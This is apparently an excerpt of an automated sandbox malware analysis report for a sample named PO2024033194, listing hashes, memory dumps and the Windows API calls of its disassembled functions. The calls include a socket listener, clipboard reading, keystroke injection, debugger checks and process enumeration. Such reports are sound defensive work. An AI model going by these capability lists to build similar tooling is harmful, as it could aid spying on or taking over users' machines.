                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$_strncmp
                                                                  • String ID: @oH$\$^$h
                                                                  • API String ID: 2175499884-3701065813
                                                                  • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                  • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                  • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                  • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                  APIs
                                                                  • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                  • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$closesocket$bindlistensocket
                                                                  • String ID:
                                                                  • API String ID: 540024437-0
                                                                  • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                  • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                  • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                  • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                  • API String ID: 0-2872873767
                                                                  • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                  • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                  • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                  • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                  • __wsplitpath.LIBCMT ref: 00475644
                                                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                  • _wcscat.LIBCMT ref: 00475657
                                                                  • __wcsicoll.LIBCMT ref: 0047567B
                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                  • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                  • String ID:
                                                                  • API String ID: 2547909840-0
                                                                  • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                  • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                  • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                  • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                  APIs
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                  • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                  • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                  • FindClose.KERNEL32(?), ref: 004525FF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                  • String ID: *.*$\VH
                                                                  • API String ID: 2786137511-2657498754
                                                                  • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                  • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                  • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                  • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                  • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                  • String ID: pqI
                                                                  • API String ID: 2579439406-2459173057
                                                                  • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                  • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                  • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                  • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                  APIs
                                                                  • __wcsicoll.LIBCMT ref: 00433349
                                                                  • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                  • __wcsicoll.LIBCMT ref: 00433375
                                                                  • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsicollmouse_event
                                                                  • String ID: DOWN
                                                                  • API String ID: 1033544147-711622031
                                                                  • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                  • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                  • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                  • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                  • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                  • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                  • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardMessagePostState$InputSend
                                                                  • String ID:
                                                                  • API String ID: 3031425849-0
                                                                  • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                  • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                  • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                  • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                  APIs
                                                                    • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 4170576061-0
                                                                  • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                  • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                  • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                  • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                  APIs
                                                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                  • IsWindowVisible.USER32 ref: 0047A368
                                                                  • IsWindowEnabled.USER32 ref: 0047A378
                                                                  • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                  • IsIconic.USER32 ref: 0047A393
                                                                  • IsZoomed.USER32 ref: 0047A3A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                  • String ID:
                                                                  • API String ID: 292994002-0
                                                                  • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                  • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                  • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                  • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                  APIs
                                                                    • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                  • CoInitialize.OLE32(00000000), ref: 00478442
                                                                  • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                  • CoUninitialize.OLE32 ref: 0047863C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                  • String ID: .lnk
                                                                  • API String ID: 886957087-24824748
                                                                  • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                  • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                  • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                  • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                  APIs
                                                                  • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                  • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                  • CloseClipboard.USER32 ref: 0046DD0D
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                  • CloseClipboard.USER32 ref: 0046DD41
                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                  • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                  • CloseClipboard.USER32 ref: 0046DD99
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                  • String ID:
                                                                  • API String ID: 15083398-0
                                                                  • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                  • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                  • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                  • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: U$\
                                                                  • API String ID: 4104443479-100911408
                                                                  • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                  • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                  • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                  • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID:
                                                                  • API String ID: 3541575487-0
                                                                  • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                  • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                  • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                  • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                  APIs
                                                                  • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                  • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                  • String ID:
                                                                  • API String ID: 48322524-0
                                                                  • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                  • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                  • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                  • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                  APIs
                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
